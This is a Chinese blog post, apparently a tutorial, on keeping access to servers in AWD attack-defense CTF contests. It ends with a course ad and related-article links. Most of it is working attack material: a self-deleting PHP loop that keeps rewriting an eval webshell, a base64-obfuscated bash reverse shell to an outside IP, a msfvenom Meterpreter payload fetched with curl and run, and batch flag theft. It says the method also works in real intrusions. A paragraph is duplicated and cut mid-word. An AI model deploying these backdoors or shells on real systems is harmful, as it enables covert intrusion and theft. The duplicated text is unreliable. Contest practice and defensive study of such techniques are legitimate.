从红队视角看AWD攻击
AWD的权限维持
攻防兼备AWD模式是一种综合考核参赛团队攻击、防御技术能力、即时策略的比赛模式。在攻防模式中,参赛队伍分别防守同样配置的虚拟靶机,并在有限的博弈时间内,找到其他战队的薄弱环节进行攻击,同时要对自己的靶机环境进行加固防守。
在AWD需要权限维持,但通常情况下,我们使用不死马来维持权限:
<?php
set_time_limit(0); //PHP脚本限制了执行时间,set_time_limit(0)设置一个脚本的执行时间为无限长
ignore_user_abort(1); //ignore_user_abort如果设置为 TRUE,则忽略与用户的断开,脚本将继续运行。
unlink(__FILE__); //删除自身
while(1)
{file_put_contents('./shell.php','<?php @eval($_GET[cmd]);?>'); //创建shell.phpsleep(0); //间隔时间
}
?>
上传之后,访问该页面,就会不断生成shell.php,我们就直接可以利用shell.php
但是这样有一些问题
防守方只要创建一个与不死马一样名字的文件夹即可终止不死马的创建
rm -rf shell.php && mkdir shell.php
并且若是对方安装日志记录等文件,对方对方便可获得你使用的shell地址和密码,反过来将这个shell利用在其他的机器上,俗称上车。
红队权限维持
在红蓝对抗模拟中,权限维持是指攻击方(红队)取得某些有限的访问权限或者获得某些信息后,需要继续保持这些权限的过程。因此,权限维持是在这种情况下必要的,以确保攻击方能够在之后的攻击行动中使用这些权限或信息。
在红队权限维持的时候,我们通常使用后渗透工具Metasploit、Cobalt
Strike等。由于AWD通常使用Linux,而Metasploit对windows和linux的兼容性都较好。这篇文章使用Metasploit来进行演示。
由于Metasploit工具有进程迁移,提权等操作,被入侵的服务器一般不容易发现自己已被入侵。这在AWD中刚好合适,并且可以使用Metasploit批量来获取FLAG。在实战中,即使站点文件全部被删除,站点已关闭,Metasploit的进程是依然存在的,这样就导致别的攻击方因为站点不存在无法攻击得分,而我们的进程依然存在从而得分,拉开比分的差距。
环境介绍
docker:https://github.com/Cl0udG0d/AWDDocker
使用了其中的Web1来进行演示
预设后门为:http://localhost:8000/?springbird=phpinfo();
docker build -t test/awd:v1.0 .
拿到主机权限
进行权限维持的第一步是拥有主机的权限
#index.php
<?phpecho "hi!This is SpringBird";@eval($_REQUEST['springbird']);
?>
可以看到这个是最简单的一句话后门,刚好适合我们来演示
连接蚁剑
在服务器上开启一个nc监听
nc -lvp 1256
反弹shell
bash -c '{echo,L2Jpbi9zaCAtaSA+JiAvZGV2L3RjcC8xMjMuMTIzLjEyMy4xMjMvMTI1NiAwPiYx}|{base64,-d}|{bash,-i}'
接收到shell
使用Metasploit进行权限维持
使用Metasploit生成后门文件
msfvenom -p linux/x64/meterpreter_reverse_tcp LHOST=你的IP LPORT=8887 -f elf > mshell.elf
之后启动一个python的http服务以供下载
python2 -m SimpleHTTPServer
启动监听
use exploit/multi/handler
set payload linux/x64/meterpreter/reverse_tcp
set LHOST 123.123.123.123
set LPORT 8887
run
之后在刚才拿到权限的服务器下载该恶意文件。
curl -O http://123.123.123.123:8000/mshell.elf && chmod +x ./mshell.elf && ./mshell.elf&
可以看到该主机已经上线。
我们多上线几台服务器来模拟AWD环境
之后我们可以用sessions -c "cat /home/flag"来批量获取flag
最后,我们把一句话后门删除,权限依然存在。
总结一下用Metasploit进行AWD的权限维持批量获取flag更加方便,也更加稳定。
at /home/flag"来批量获取flag
[外链图片转存中…(img-0xHzamJ3-1676903687455)]
最后,我们把一句话后门删除,权限依然存在。
总结一下用Metasploit进行AWD的权限维持批量获取flag更加方便,也更加稳定。
最后
对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。
同时每个成长路线对应的板块都有配套的视频提供:
当然除了有配套的视频,同时也为大家整理了各种文档和书籍资料&工具,并且已经帮大家分好类了。
因篇幅有限,仅展示部分资料,有需要的小伙伴,可以【扫下方二维码】免费领取:
从红队视角看AWD攻击相关推荐
- 【高级持续性威胁跟踪】红队视角看Sunburst后门中的TTPs
针对SolarWinds供应链攻击简介 最近FireEye披露的UNC2452黑客组织入侵SolarWinds的供应链攻击让安全从业人员印象深刻.一是影响规模大,SolarWinds官方称受影响的客户 ...
- 红队视角下的防御体系突破之第一篇介绍、阶段、方法
文章目录 0x01 什么是红队 一.红队与黑客的区别 二.红队的工作与业界熟知的渗透测试区别 三.红队的组成 0x02 红队三板斧--攻击的三个阶段 一. 第一阶段:情报收集 二. 第二阶段:建立据点 ...
- 谁是鱼谁是饵?红队视角下蜜罐识别方式汇总
引言 蜜罐技术本质上是对网络攻击方进行欺骗的一项技术,通过在服务上布置一些仿真的系统.网络服务.或是模拟一些物联网设备来诱惑攻击方对其实施攻击从而捕获攻击行为.分析攻击手段与方式.或是收集一些攻击者的 ...
- 红队视角下的防御体系突破之第二篇案例分析
文章目录 0x04 红队三十六计--经典攻击实例 一. 浑水摸鱼--社工钓鱼突破系统 二. 声东击西--混淆流量躲避侦察 三. 李代桃僵--旁路攻击搞定目标 四. 顺手牵羊--巧妙种马实施控制 五. ...
- 从防御者视角看APT攻击
前言 APT防御的重要性毋庸讳言,为了帮助各位师傅在防御方面建立一个总体认识,本文会将APT防御方法分为三类,分别是:监控.检测和缓解技术,并分别进行梳理,介绍分析代表性技术.这一篇分析现有的监控技术 ...
- Notes Twenty-third days-渗透攻击-红队-红队自研
** Notes Twenty-third days-渗透攻击-红队-权限提升(dayu) ** 作者:大余 时间:2020-10-9 请注意:对于所有笔记中复现的这些终端或者服务器,都是自行搭建的环 ...
- 2020.8.17红队威胁情报-日更
今日红队ip库,文章每日更新 请在https://www.secshi.com/41563.html评论区留言威胁情报,将会选取用户送出定制鼠标垫! 链接: https://pan.baidu.com ...
- 90%的人都不算会网络安全,这才是真正的白帽子技术【红队】
我敢说,现在网上90%的文章都没有把网络安全该学的东西讲清楚. 为什么?因为全网更多的都是在讲如何去渗透和公鸡,却没有把网安最注重的防御讲明白. 老话说得好:"攻击,是为了更好的防御.&qu ...
- 红队攻击演练过程中必须具备哪些能力
开展网络渗透对蓝队人员的岗位技能和动手能力都有较高的要 求,这些能力要求侧重于攻防实战,是蓝队人员综合能力水平的体 现.因为蓝队人员在实战攻防演练中面对的是十分契合真实网络条件 的环境,各项技能与手段 ...
最新文章
- pythonweb编程免费教程_python – Web编程教程
- 关于大型网站技术演进的思考(七)--存储的瓶颈(7)
- kettle预览点两下才出数_孩子过生日选“阴历”还是“阳历”?有3点讲究,需斟酌再决定...
- 关于SQL Server
- python response.read_AttributeError:“Response”对象没有“read”属性
- mysql导入数据提前修改字段_Mysql一些导入导出数据库,添加修改字段命令_MySQL...
- Apache Hadoop HDFS数据节点Apache Mesos框架
- php表单验证内容不能为空,php校验表单检测字段是否为空的方法_PHP教程
- 北大OJ(POJ 2795)金银岛
- OpenCV-均值滤波cv::blur
- 拓端tecdat|Python中利用长短期记忆模型LSTM进行时间序列预测分析 - 预测电力负荷数据
- nmap扫描器的使用
- UCGUI信息处理机制
- Spring STS 修改启动Java VM
- 用 Dev-C++ 编写简单的平均数/中位数/众数/方差/一元线性回归方程计算器(附带控制台颜色设置,选择界面)
- 英尺、英寸和厘米的换算
- Android Intent跳转第三方地图应用,传入地址
- 5G中大规模MIMO系统通信的若干分析
- Questasim覆盖率数据分析
- unrar file.rar 解压rar 问题,找不到unrar 命令。安装rar unrar流程及bug处理
热门文章
- ExecutorService,Executors 使用
- .Net 常用的ORM框架
- 劫持outlook与IE浏览器实现权限维持
- 使用ffmpeg 提取视频关键帧
- java实时语音通话案例_java语音播报案例
- INTERVAL的使用
- 清华计算机学院考研真题,清华大学计算机考研912真题(回忆版)
- vue cli可视化面板运行serve报错:Error: Package exports for ‘D:\*******(路径)\node_modules\colorette‘ do not defi
- 20154312 曾林 Exp8 web基础
- 安装MinGW和MSYS